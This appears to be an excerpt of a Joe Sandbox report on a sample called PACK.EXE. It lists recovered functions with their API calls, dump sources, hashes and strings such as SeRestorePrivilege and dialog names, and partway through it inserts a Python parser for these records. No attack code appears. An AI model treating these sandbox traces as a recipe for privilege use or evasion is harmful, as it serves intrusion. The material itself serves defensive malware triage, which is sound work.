• API ID: ItemText$DialogWindow
• String ID: RENAMEDLG
• API String ID: 445417207-3299779563
• Opcode ID: a76b65ce4d39a4e6a6259e8815632cc11002de8e887f3447df4d3a5464f68ff1
• Instruction ID: 0d9eb47b8bdecfa348189de1d8125fb5126e88855e17e1ec6b6c87aededb1497
• Opcode Fuzzy Hash: a76b65ce4d39a4e6a6259e8815632cc11002de8e887f3447df4d3a5464f68ff1
• Instruction Fuzzy Hash: D701F5336A022D7AD2125EA46E84F76BB6CE75AB80F204025F701B6090C2A2AC219761
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0030ABAF
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030ABD2
  • Part of subcall function 00307A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0030ABF8
• _free.LIBCMT ref: 0030AC0B
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030AC1A
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 1502d66538a45a0002419a9ba60e56067f0037d4e32ef33e07a8b77d15f0670f
• Instruction ID: ca79f8c68f090627d1f52f870e9f9b7a5b217f5b6b5d4be34aa29aaff7b506ef
• Opcode Fuzzy Hash: 1502d66538a45a0002419a9ba60e56067f0037d4e32ef33e07a8b77d15f0670f
• Instruction Fuzzy Hash: 8701D872603B147FB323967A7C5CCBF796DDACABA03174129FD04C7280DA608D0192B1
APIs
• GetLastError.KERNEL32(?,?,?,00307ED1,00307B6D,?,00308544,00000001,00000364,?,00302E0F,?,?,003200E0), ref: 0030859F
• _free.LIBCMT ref: 003085D4
• _free.LIBCMT ref: 003085FB
• SetLastError.KERNEL32(00000000,?,003200E0), ref: 00308608
• SetLastError.KERNEL32(00000000,?,003200E0), ref: 00308611
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 8e3b5fa6fab62820cca46aff6c9e48f9f2095604895dd99e63f38f9c87131afe
• Instruction ID: 993e0d458e690103acba30f90ece4eb33eec840b6398cfda1df98066cb209080
• Opcode Fuzzy Hash: 8e3b5fa6fab62820cca46aff6c9e48f9f2095604895dd99e63f38f9c87131afe
• Instruction Fuzzy Hash: 6A01F47A2076006BD71377386CA5A6B366D9BC63B5B274124FA85972C3EF329D018168
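The function records above (API call sites, memory dump source, similarity hashes) are what Joe Sandbox emits for every function it recovers from the dump at 002E0000, and reading hundreds of them by hand is slow. The Python below is an added example, not part of this report and not Joe Sandbox code: it parses records in the text layout shown on this page into objects, so you can list a function's direct call sequence in address order (subcalls excluded), turn call-site addresses into RVAs using the "Offset" in the Source File line, look up a function by its Instruction Fuzzy Hash when matching it against another sample's report, and find every function that calls a given API. The embedded sample is two records copied from this section, trimmed to the fields the parser uses; the regexes encode an assumption about the layout as it appears here and would need adjusting for a different export.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from this section of the report, trimmed
# to the fields the parser reads (the '_abort' error-path block and the RENAMEDLG
# dialog block).
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,003200E0,00303394,003200E0,?,?,00302E0F,?,?,003200E0), ref: 0030851A
• _free.LIBCMT ref: 0030854D
• _free.LIBCMT ref: 00308575
• SetLastError.KERNEL32(00000000,?,003200E0), ref: 00308582
• SetLastError.KERNEL32(00000000,?,003200E0), ref: 0030858E
• _abort.LIBCMT ref: 00308594
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• Instruction ID: 4a7e3b1ba3ad8218631ba06fa6d72d4a8f9a212003869783ea38b27ca8e279e4
• Instruction Fuzzy Hash: 32F0283564760067C30333347C2AF6F226D8BD67B1F264625F559AB2D1EE308E028124
APIs
  • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
  • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
• EndDialog.USER32(?,00000001), ref: 002FC2F2
• GetDlgItemTextW.USER32(?,00000068,00000800), ref: 002FC308
• SetDlgItemTextW.USER32(?,00000066,?), ref: 002FC322
• SetDlgItemTextW.USER32(?,00000068), ref: 002FC32D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
Similarity
• API ID: ItemText$DialogWindow
• String ID: RENAMEDLG
• Instruction ID: 0d9eb47b8bdecfa348189de1d8125fb5126e88855e17e1ec6b6c87aededb1497
• Instruction Fuzzy Hash: D701F5336A022D7AD2125EA46E84F76BB6CE75AB80F204025F701B6090C2A2AC219761
"""

# Assumed layout of a call line: "• Name.MODULE(args), ref: ADDR", optionally
# prefixed with "Part of subcall function XXXX:" and optionally without "(args)".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")   # "• Key: value"
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                      # absolute address of the call site in the dump
    parent: Optional[str] = None  # set when the call lives in a subcalled function

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def image_base(self) -> int:
        m = OFFSET_RE.search(self.fields.get("Source File", ""))
        return int(m.group(1), 16) if m else 0

    def direct_calls(self):
        """Calls made by this function itself, in address order."""
        return sorted((c for c in self.calls if c.parent is None), key=lambda c: c.ref)

    def call_sequence(self):
        return [c.name for c in self.direct_calls()]

    def rva(self, call: ApiCall) -> int:
        return call.ref - self.image_base

    def modules(self):
        return sorted({c.module for c in self.calls})

def parse_records(text: str):
    """Split the text into records (each starts at an 'APIs' line) and fill them."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not stripped.startswith("•"):
            continue  # section headers such as 'Similarity' carry no data themselves
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a != ""]
            current.calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                         int(m.group("ref"), 16), m.group("parent")))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m.group("key")] = m.group("val")
    return records

def index_by_instruction_hash(records):
    """Key records by Instruction Fuzzy Hash, the handle to match a function across reports."""
    return {r.fields["Instruction Fuzzy Hash"]: r
            for r in records if "Instruction Fuzzy Hash" in r.fields}

def callers_of(records, api_name):
    """(Instruction ID, RVA) for every direct call site of api_name."""
    return [(r.fields.get("Instruction ID", "?"), r.rva(c))
            for r in records for c in r.direct_calls() if c.name == api_name]

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("API ID"), rec.call_sequence(), rec.modules())
```

Feed the whole exported report text to `parse_records` rather than the trimmed sample; records without a Source File line get an image base of 0, so check `image_base` before trusting RVAs from a dump whose offset line was lost in extraction.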
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002F0697: ResetEvent.KERNEL32(?), ref: 002F06A9
                                                                                                                                                • Part of subcall function 002F0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002F06BD
                                                                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002F03FB
                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 002F0415
                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 002F042E
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 002F043A
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 002F0446
                                                                                                                                                • Part of subcall function 002F04BA: WaitForSingleObject.KERNEL32(?,000000FF,002F05D9,?,?,002F064E,?,?,?,?,?,002F0638), ref: 002F04C0
                                                                                                                                                • Part of subcall function 002F04BA: GetLastError.KERNEL32(?,?,002F064E,?,?,?,?,?,002F0638), ref: 002F04CC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1868215902-0
                                                                                                                                              • Opcode ID: 109b801c959b7591521345961167f107ad1f9fac4101e804382886e0d7b613fc
                                                                                                                                              • Instruction ID: 78a7275388225cd7059c305c161c31298d1982883ffe8a99c2c9c4fa3466e5b4
                                                                                                                                              • Opcode Fuzzy Hash: 109b801c959b7591521345961167f107ad1f9fac4101e804382886e0d7b613fc
                                                                                                                                              • Instruction Fuzzy Hash: 58019272400708EBC7329B64DC84BD7FBADFB4C750F004629F25A92161C7756964CB90
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 0030B479
                                                                                                                                                • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
                                                                                                                                                • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
                                                                                                                                              • _free.LIBCMT ref: 0030B48B
                                                                                                                                              • _free.LIBCMT ref: 0030B49D
                                                                                                                                              • _free.LIBCMT ref: 0030B4AF
                                                                                                                                              • _free.LIBCMT ref: 0030B4C1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: de9b2e7e45c53a94137caf74cad83e2a7cd82a07e0fcc71e9f27c058aa208899
                                                                                                                                              • Instruction ID: ed47d2559c8edd8e5e2afe2eb7d3714701424214f6e6b5e7ba9dc95f2a442794
                                                                                                                                              • Opcode Fuzzy Hash: de9b2e7e45c53a94137caf74cad83e2a7cd82a07e0fcc71e9f27c058aa208899
                                                                                                                                              • Instruction Fuzzy Hash: 6EF03632A0A210ABC623DB75F896C5BF7FDAF05750B559805F04DEB691C734FE808A54
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 003075F9
                                                                                                                                                • Part of subcall function 00307A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?), ref: 00307A66
                                                                                                                                                • Part of subcall function 00307A50: GetLastError.KERNEL32(?,?,0030B4F8,?,00000000,?,00000000,?,0030B51F,?,00000007,?,?,0030B91C,?,?), ref: 00307A78
                                                                                                                                              • _free.LIBCMT ref: 0030760B
                                                                                                                                              • _free.LIBCMT ref: 0030761E
                                                                                                                                              • _free.LIBCMT ref: 0030762F
                                                                                                                                              • _free.LIBCMT ref: 00307640
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                              • Opcode ID: 38514ebd262979ef5672b1e129b8d998a99312701ba665de597ae959cc16a670
                                                                                                                                              • Instruction ID: 6b211af029398d13e573db32c4e5070c7640209d6127f3deaeefccc913dfe1e8
                                                                                                                                              • Opcode Fuzzy Hash: 38514ebd262979ef5672b1e129b8d998a99312701ba665de597ae959cc16a670
                                                                                                                                              • Instruction Fuzzy Hash: 32F01D78E0A2288BC60BAF26FD1545E37A8BB0A710B065515F2125E3B1CB3136118EC5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 0-2989149754
                                                                                                                                              • Opcode ID: ca4e7df9a14e1f4cc521906e5ca947d228e32178eff0779c8e5d092ea3ac1758
                                                                                                                                              • Instruction ID: 6bdfafab884b1ea87cf83f3df8ebfa0e28e2fde6b8ddd93ed6cf8712a374a5b4
                                                                                                                                              • Opcode Fuzzy Hash: ca4e7df9a14e1f4cc521906e5ca947d228e32178eff0779c8e5d092ea3ac1758
                                                                                                                                              • Instruction Fuzzy Hash: 0151B371F0620A9BDF179FA4C865FAEBBB8AF09314F150849F415AB2D2D734AD01CB61
                                                                                                                                              APIs
                                                                                                                                              • _free.LIBCMT ref: 00309FAF
                                                                                                                                                • Part of subcall function 00307DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00307DAA,0000002C,0031A968,0030AF68,00000000,00000000,00308599,?,?,00307DB7,00000000,00000000,00000000,00000000,00000000), ref: 00307DBD
                                                                                                                                                • Part of subcall function 00307DBB: GetCurrentProcess.KERNEL32(C0000417,0031A968,0000002C,00307AE8,00000016,00308599), ref: 00307DDF
                                                                                                                                                • Part of subcall function 00307DBB: TerminateProcess.KERNEL32(00000000), ref: 00307DE6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                              • String ID: *?$.$S#~>
                                                                                                                                              • API String ID: 2667617558-205569129
                                                                                                                                              • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                                                                                                                                              • Instruction ID: 6681759d5367b4f33c9f2e1149ba2bd6d572f05076e4316fd2015d63e2fae213
                                                                                                                                              • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                                                                                                                                              • Instruction Fuzzy Hash: 1D51D675E0120AEFDF16DFA8C891AADB7F5EF48310F25416AE454E7382E6319E01CB50
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,00000104), ref: 00306CB3
                                                                                                                                              • _free.LIBCMT ref: 00306D7E
                                                                                                                                              • _free.LIBCMT ref: 00306D88
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                              • API String ID: 2506810119-1038607665
                                                                                                                                              • Opcode ID: ff594ef3a1af7485472a094be274fa5f8770f578dd9a8aa1156994e052ba41c0
                                                                                                                                              • Instruction ID: 6769d412c03bb350c63e191d75a8549499bc7fdb4a76a16eec8133ef6ca0b489
                                                                                                                                              • Opcode Fuzzy Hash: ff594ef3a1af7485472a094be274fa5f8770f578dd9a8aa1156994e052ba41c0
                                                                                                                                              • Instruction Fuzzy Hash: 3A31A071B02218AFDB23DF99DC9699EBBFCEF85310F114066F9049B295D6705E50CBA0
                                                                                                                                              APIs
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,0030EAAF,00000000,00000000,00000000), ref: 0030E803
                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0030EAAF,00000000,00000000,00000000,00000000,00000000,00303FBF,00000000,00303FBF,0031AA70), ref: 0030E831
                                                                                                                                              • GetLastError.KERNEL32(?,0030EAAF,00000000,00000000,00000000,00000000,00000000,00303FBF,00000000,00303FBF,0031AA70,00000010,0030D947,00000000,0031A9E8,00000010), ref: 0030E862
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 2456169464-2989149754
                                                                                                                                              • Opcode ID: c6805c5db41f86dcb25eded020588941e7ad07cf39bcaa7a0a3cbe8468795483
                                                                                                                                              • Instruction ID: 27285cc14c2daef84d816dc2314f7f0266317c9c21f65f62dc1ef7e3e9ba7c31
                                                                                                                                              • Opcode Fuzzy Hash: c6805c5db41f86dcb25eded020588941e7ad07cf39bcaa7a0a3cbe8468795483
                                                                                                                                              • Instruction Fuzzy Hash: 03317075B112199FDB19CF59DC919EAB7B8EB08700F0084BDE90AD7290D730AD80CF60
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E73BE
                                                                                                                                                • Part of subcall function 002E399D: __EH_prolog.LIBCMT ref: 002E39A2
                                                                                                                                              • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 002E7485
                                                                                                                                                • Part of subcall function 002E7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 002E7A24
                                                                                                                                                • Part of subcall function 002E7A15: GetLastError.KERNEL32 ref: 002E7A6A
                                                                                                                                                • Part of subcall function 002E7A15: CloseHandle.KERNEL32(?), ref: 002E7A79
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                              • API String ID: 3813983858-639343689
                                                                                                                                              • Opcode ID: b2dbfbff7878cd71848eba79c6b67fa3762d28421fd70195fab6fd1a6af0f4aa
                                                                                                                                              • Instruction ID: 62f55346e93b0c08cecc2c60b02f8d93757a99ea6e0d0a398144da40eb18188b
                                                                                                                                              • Opcode Fuzzy Hash: b2dbfbff7878cd71848eba79c6b67fa3762d28421fd70195fab6fd1a6af0f4aa
                                                                                                                                              • Instruction Fuzzy Hash: 4031EB71954289AAEF21EF65DC41BFE7B7DAF59340F808069F408A7192C7744D64CBB0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002F9C15
                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 002F9C2A
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 002F9C3F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                              • String ID: ASKNEXTVOL
                                                                                                                                              • API String ID: 445417207-3402441367
                                                                                                                                              • Opcode ID: d9236920cda979abd509b055dae3c5c5883375528eff36739d7b5b369649366c
                                                                                                                                              • Instruction ID: 10f84ae861fe187b2c33bae9b27a922f15c794b338bdddaa7ff3fd3d79a97fd0
                                                                                                                                              • Opcode Fuzzy Hash: d9236920cda979abd509b055dae3c5c5883375528eff36739d7b5b369649366c
                                                                                                                                              • Instruction Fuzzy Hash: D611DA336641456FD6129F68DE48FB677ACEB4F340F440032F30196071C7A29AA28B25
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
